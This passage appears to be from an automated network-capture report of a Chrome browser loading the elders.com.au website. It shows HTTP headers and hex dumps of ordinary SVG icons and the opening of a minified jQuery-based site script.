                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                    ETag: "0x8DC582BB2D62837"
                                                                                                                                    x-ms-request-id: 23aea2f2-001e-0065-4c65-2e0b73000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080319Z-157b9fd754fk82tlhC1SN1x7tg000000043g0000000068w5
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:20 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    67192.168.2.449833162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:20 UTC686OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:20 UTC587INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"4ca-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 56966
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210077-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730285979.734085,VS0,VS0,VE676
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53a42e974865-DFW
                                                                                                                                    2024-11-05 08:03:20 UTC782INData Raw: 34 63 61 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 63 6c 69 70 30 5f 38 34 30 37 5f 31 33 34 37 32 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 2e 35 20 32 32 2e 35 43 38 2e 33 32 38 34 33 20 32 32 2e 35 20 39 20 32 31 2e 38 32 38 34 20 39 20 32 31 43 39 20 32 30 2e 31 37 31 36 20 38 2e 33 32 38 34 33 20 31 39 2e 35 20 37 2e 35 20 31 39 2e 35 43 36 2e 36 37 31 35 37 20 31 39 2e 35 20 36 20 32 30 2e 31 37 31 36 20 36 20 32 31 43 36 20 32 31 2e 38 32 38
                                                                                                                                    Data Ascii: 4ca<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0_8407_13472)"><path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.828
                                                                                                                                    2024-11-05 08:03:20 UTC451INData Raw: 20 31 39 2e 39 37 39 36 20 31 33 2e 33 34 31 35 43 32 30 2e 31 31 36 33 20 31 33 2e 32 33 34 38 20 32 30 2e 32 31 31 39 20 31 33 2e 30 38 34 31 20 32 30 2e 32 35 20 31 32 2e 39 31 34 39 4c 32 31 2e 37 35 20 36 2e 31 36 34 39 31 43 32 31 2e 37 37 35 31 20 36 2e 30 35 33 36 33 20 32 31 2e 37 37 34 35 20 35 2e 39 33 38 30 38 20 32 31 2e 37 34 38 33 20 35 2e 38 32 37 30 36 43 32 31 2e 37 32 32 20 35 2e 37 31 36 30 34 20 32 31 2e 36 37 30 38 20 35 2e 36 31 32 34 37 20 32 31 2e 35 39 38 35 20 35 2e 35 32 34 32 34 43 32 31 2e 35 32 36 31 20 35 2e 34 33 36 20 32 31 2e 34 33 34 37 20 35 2e 33 36 35 34 33 20 32 31 2e 33 33 30 39 20 35 2e 33 31 37 39 43 32 31 2e 32 32 37 32 20 35 2e 32 37 30 33 36 20 32 31 2e 31 31 34 20 35 2e 32 34 37 31 31 20 32 31 20 35 2e 32 34
                                                                                                                                    Data Ascii: 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.2272 5.27036 21.114 5.24711 21 5.24
                                                                                                                                    2024-11-05 08:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    68192.168.2.449836162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:20 UTC471OUTGET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:20 UTC598INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    cache-control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Thu, 29 Feb 2024 03:45:04 GMT
                                                                                                                                    etag: W/"0-2386f26fb1bdc0"
                                                                                                                                    x-vhost: publish
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Age: 409655
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-dfw-kdfw8210161-DFW
                                                                                                                                    X-Cache: HIT
                                                                                                                                    X-Timer: S1709578051.675756,VS0,VS0,VE1
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53a4fb0d6b05-DFW


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    69192.168.2.449839162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:20 UTC423OUTGET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:20 UTC629INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    content-disposition: attachment; filename="el-logo-2.svg"
                                                                                                                                    last-modified: Tue, 22 Nov 2022 06:53:39 GMT
                                                                                                                                    etag: W/"ebc-5ee09a1ba22c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-sjc10066-SJC
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730658879.828968,VS0,VS0,VE425
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 652
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53a50d98c871-DFW
                                                                                                                                    2024-11-05 08:03:20 UTC740INData Raw: 65 62 63 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 36 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 36 20 32 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 35 2e 31 32 34 31 20 39 2e 33 37 36 37 43 37 33 2e 39 31 30 39 20 39 2e 30 31 38 30 31 20 37 33 2e 31 31 39 37 20 38 2e 39 38 36 33 36 20 37 32 2e 32 30 31 38 20 38 2e 39 39 36 39 31 43 37 31 2e 31 32 35 37 20 39 2e 30 31 38 30 31 20 37 30 2e 32 31 38 34 20 39 2e 32 35 30 31 31 20 36 39 2e 34 38 20 39 2e 36 34 30 34 35 43 36 38 2e 35 35 31 36 20 39 2e 30 37 30 37 36 20 36 37 2e 34 39 36 36 20 38 2e 39 30 31 39 36 20 36 36 2e
                                                                                                                                    Data Ascii: ebc<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 20 34 38 2e 35 33 38 35 20 31 37 2e 32 35 37 34 20 34 38 2e 39 33 39 34 20 31 37 2e 31 39 34 31 43 34 39 2e 31 35 30 34 20 31 37 2e 31 36 32 35 20 34 39 2e 32 39 38 31 20 31 37 2e 31 30 39 37 20 34 39 2e 34 31 34 31 20 31 37 2e 30 37 38 31 43 35 33 2e 30 35 33 38 20 31 35 2e 37 38 30 35 20 35 34 2e 34 30 34 32 20 31 33 2e 37 37 36 20 35 34 2e 38 30 35 31 20 31 33 2e 30 35 38 36 43 35 35 2e 33 34 33 32 20 31 32 2e 31 30 39 31 20 35 35 2e 34 35 39 32 20 31 30 2e 38 33 32 36 20 35 34 2e 35 39 34 31 20 39 2e 38 39 33 36 35 43 35 33 2e 36 36 35 37 20 38 2e 39 30 31 39 36 20 35 30 2e 36 30 36 33 20 38 2e 32 31 36 32 32 20 34 36 2e 39 31 33 38 20 31 30 2e 38 33 32 36 43 34 34 2e 35 36 31 32 20 31 32 2e 34 39 39 35 20 34 32 2e 35 33 35 36 20 31 34 2e 37 36 37 37
                                                                                                                                    Data Ascii: 48.5385 17.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 39 20 33 2e 38 35 39 31 33 20 32 35 2e 33 37 31 20 33 2e 34 37 39 33 34 43 32 36 2e 35 31 30 34 20 32 2e 34 34 35 34 36 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 43 32 37 2e 33 39 36 36 20 31 2e 32 33 32 32 32 20 32 37 2e 31 33 32 39 20 30 2e 35 38 38 36 38 32 20 32 36 2e 34 34 37 31 20 30 2e 34 37 32 36 33 33 43 32 33 2e 35 35 36 35 20 2d 30 2e 30 33 33 37 35 39 34 20 32 31 2e 37 36 33 20 2d 30 2e 30 31 32 36 35 39 38 20 31 39 2e 39 33 37 39 20 30 2e 30 30 38 34 33 39 38 37 43 31 36 2e 34 37 37 35 20 30 2e 30 36 31 31 38 39 31 20 31 32 2e 38 34 38 34 20 31 2e 32 39 35 35 32 20 31 31 2e 30 32 33 32 20 32 2e 38 31 34 37 43 39 2e 31 38 37 35 38 20 34 2e 33 34 34 34 33 20 38 2e 34 33 38 35 33 20 36 2e 38
                                                                                                                                    Data Ascii: 9 3.85913 25.371 3.47934C26.5104 2.44546 27.0485 1.64367 27.0485 1.64367C27.3966 1.23222 27.1329 0.588682 26.4471 0.472633C23.5565 -0.0337594 21.763 -0.0126598 19.9379 0.00843987C16.4775 0.0611891 12.8484 1.29552 11.0232 2.8147C9.18758 4.34443 8.43853 6.8
                                                                                                                                    2024-11-05 08:03:20 UTC301INData Raw: 30 39 34 31 20 37 35 2e 34 34 30 36 20 31 30 2e 30 39 34 31 43 37 35 2e 36 34 31 31 20 39 2e 38 35 31 34 35 20 37 35 2e 34 38 32 38 20 39 2e 35 32 34 34 20 37 35 2e 30 38 31 39 20 39 2e 34 30 38 33 35 4d 33 35 2e 39 36 33 31 20 31 33 2e 38 31 38 32 43 33 30 2e 38 33 35 39 20 31 39 2e 35 30 34 36 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 43 32 38 2e 32 35 31 32 20 31 36 2e 35 39 32 38 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 43 33 35 2e 37 30 39 39 20 31 30 2e 31 35 37 34 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 43 33 37 2e 31 32 33 36 20 31 32 2e 37 39 34 39 20 33 35 2e 39 37 33 36 20 31 33 2e
                                                                                                                                    Data Ascii: 0941 75.4406 10.0941C75.6411 9.85145 75.4828 9.5244 75.0819 9.40835M35.9631 13.8182C30.8359 19.5046 29.6015 17.8588 29.6015 17.8588C28.2512 16.5928 31.2051 13.9237 31.2051 13.9237C35.7099 10.1574 36.6699 12.0353 36.6699 12.0353C37.1236 12.7949 35.9736 13.
                                                                                                                                    2024-11-05 08:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    70192.168.2.449835162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:20 UTC637OUTGET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:20 UTC628INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Mon, 30 Sep 2024 10:02:26 GMT
                                                                                                                                    etag: W/"250df-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 507988
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210119-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1727690545.479718,VS0,VS0,VE1003
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53a50aa14767-DFW
                                                                                                                                    2024-11-05 08:03:20 UTC741INData Raw: 37 64 32 61 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 73 69 74 65 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 36 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 65 78 70 6f 72 74 73 3f 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 6f 63 75 6d 65 6e 74 3f 6e 28 74 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20
                                                                                                                                    Data Ascii: 7d2a/*! For license information please see site.js.LICENSE.txt */!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 6e 74 2c 77 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 6f 2c 69 3d 28 6e 3d 6e 7c 7c 62 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 69 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 77 29 28 6f 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 6f 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29
                                                                                                                                    Data Ascii: nt,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e)
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 2e 70 75 73 68 53 74 61 63 6b 28 6e 3e 3d 30 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 63 2c 73 6f 72 74 3a 69 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 69 2e 73 70 6c 69 63 65 7d 2c 43 2e 65 78 74 65 6e 64 3d 43 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 2c 69 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 63 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 63 3d 61
                                                                                                                                    Data Ascii: .pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:c,sort:i.sort,splice:i.splice},C.extend=C.fn.extend=function(){var e,t,n,r,o,i,a=arguments[0]||{},s=1,l=arguments.length,c=!1;for("boolean"==typeof a&&(c=a
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 26 28 53 28 4f 62 6a 65 63 74 28 65 29 29 3f 43 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 63 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 75 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6b 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72
                                                                                                                                    Data Ascii: &(S(Object(e))?C.merge(n,"string"==typeof e?[e]:e):c.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!k.test(t||n&&n.nodeName||"HTML")},mer
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 63 65 28 6a 2c 50 29 7d 3b 76 61 72 20 4d 3d 62 2c 4f 3d 63 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 61 2c 6c 2c 63 2c 64 2c 70 2c 68 2c 6d 3d 4f 2c 76 3d 43 2e 65 78 70 61 6e 64 6f 2c 79 3d 30 2c 62 3d 30 2c 77 3d 65 65 28 29 2c 78 3d 65 65 28 29 2c 4c 3d 65 65 28 29 2c 45 3d 65 65 28 29 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 53 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f
                                                                                                                                    Data Ascii: ce(j,P)};var M=b,O=c;!function(){var e,t,n,o,a,l,c,d,p,h,m=O,v=C.expando,y=0,b=0,w=ee(),x=ee(),L=ee(),E=ee(),k=function(e,t){return e===t&&(a=!0),0},S="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|reado
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 5c 5c 66 5d 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 7a 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 4a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 56 3d 2f 5b 2b 7e 5d 2f 2c 59 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e
